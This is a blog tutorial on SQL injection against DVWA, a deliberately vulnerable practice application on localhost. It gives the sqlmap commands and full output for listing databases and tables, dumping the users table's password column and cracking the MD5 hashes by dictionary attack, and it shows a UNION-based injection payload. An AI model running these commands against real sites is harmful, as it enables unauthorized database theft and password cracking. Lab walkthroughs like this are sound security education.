Wednesday, February 1, 2012

DVWA : SQL Injection

DVWA(Damn Vulnurable Web Application) is a web that have a lot of security issues inside. 
Lets try to Inject it with sqlmap.

1. Start your mysql and apache2 service.
# service apache2 start
# service mysql start

2. Open your browser and type the url of your dvwa.
localhost/dvwa

3. We need to setup a database first, click the link.

4. Once you're done, you're ready to go. Login with the user : admin password : password

5. Set the DVWA Security to Low.

6. Click the SQL Injection section
7. Then try to enter ' in the form. An error page will appear.

8. Lets try some more code.

9. Great, now lets hack it using sqlmap.
# cd /pentest/database/sqlmap

10. Before execute the command lets try to catch the packet sent using Burpsuite. (I'll explain more about burpsuite later)
After capture the packet I got the following results. I'll use the link and the cookie captured to perform the sqlmap command.

11. Execute the command
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" --dbs
Get the following results
Spoiler:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 18:47:15

[18:47:15] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[18:47:15] [INFO] resuming injection data from session file
[18:47:15] [INFO] resuming back-end DBMS 'mysql 5' from session file
[18:47:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[18:47:16] [INFO] manual usage of GET payloads requires url encoding
[18:47:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[18:47:16] [INFO] fetching database names
[18:47:16] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, mysql
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[18:47:16] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 18:47:16


Get the databases on the server

12. Okay, now lets see the tables on the "dvwa" database. Execute this command.
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" -D dvwa --tables
The results
Spoiler:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 18:53:45

[18:53:45] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[18:53:45] [INFO] resuming injection data from session file
[18:53:45] [INFO] resuming back-end DBMS 'mysql 5' from session file
[18:53:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[18:53:45] [INFO] manual usage of GET payloads requires url encoding
[18:53:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[18:53:45] [INFO] fetching tables for database: dvwa
[18:53:45] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[18:53:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 18:53:45


Found two tables, guestbook and users.

13. Because we want to see the users lets use to execute the next command.
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" -D dvwa -T users --column
Results
Spoiler:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 19:17:00

[19:17:00] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[19:17:00] [INFO] resuming injection data from session file
[19:17:00] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:17:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[19:17:00] [INFO] manual usage of GET payloads requires url encoding
[19:17:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[19:17:00] [INFO] fetching columns for table 'users' on database 'dvwa'
[19:17:00] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[19:17:00] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 19:17:00


Found all the columns.

14. Next, lets see the whats inside the password columns.
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%1&Submit=Submit" --cookie "security=low; PHPSESSID=j0cerp7v72o453prnun2s6tam2" -D dvwa -T users -C password --dump
And the results..
Spoiler:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 19:18:16

[19:18:16] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[19:18:16] [INFO] resuming injection data from session file
[19:18:16] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,114,121,103,58),CHAR(85,120,121,98,86,107,114,83,109,101),CHAR(58,115,122,113,58))# &Submit=Submit
---

[19:18:16] [INFO] manual usage of GET payloads requires url encoding
[19:18:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[19:18:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[19:18:22] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': password, varchar(32)
[19:18:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
[19:18:22] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': 5f4dcc3b5aa765d61d8327deb882cf99, e99a18c428cb38d5f260853678922e03, 8d3533d75ae2c3966d7e0d4fcc69216b, 0d107d09f5bbe40cade3de5c71e9e9b7, 5f4dcc3b5aa765d61d8327deb882cf99
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[19:18:25] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[19:18:28] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[19:18:31] [INFO] starting dictionary attack (md5_generic_passwd)
[19:18:31] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'                                                                                         
[19:18:31] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'                                                                                        
[19:18:32] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'                                                                                        
[19:18:32] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'                                                                                       
Database: dvwa                                                                                                                                                         
Table: users
[4 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[19:18:32] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[19:18:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 19:18:32


The password is encrypted, fortunatelly sqlmap can bruteforce it to found the password.  :)

"the quieter you become, the more you are able to hear.."

0 comments:

Post a Comment